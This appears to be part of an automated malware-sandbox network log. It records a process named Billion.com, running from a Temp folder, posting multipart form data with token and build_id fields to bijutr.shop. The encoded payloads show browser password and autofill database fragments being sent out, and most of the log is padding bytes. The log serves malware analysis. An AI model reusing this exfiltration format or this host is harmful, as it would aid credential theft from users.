                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:05 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        17192.168.2.649884188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:05 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----WLFCTR900ZUAAI58QQQ1
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 55081
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 52 39 30 30 5a 55 41 41 49 35 38 51 51 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 52 39 30 30 5a 55 41 41 49 35 38 51 51 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 52 39 30 30 5a 55 41 41 49 35 38 51 51 51 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------WLFCTR900ZUAAI58QQQ1Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------WLFCTR900ZUAAI58QQQ1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WLFCTR900ZUAAI58QQQ1Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:05 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:05 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:07 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        18192.168.2.649890188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----WTRQIE37YCBIM7Q16XBI
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 142457
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WTRQIE37YCBIM7Q16XBICont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                                        Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
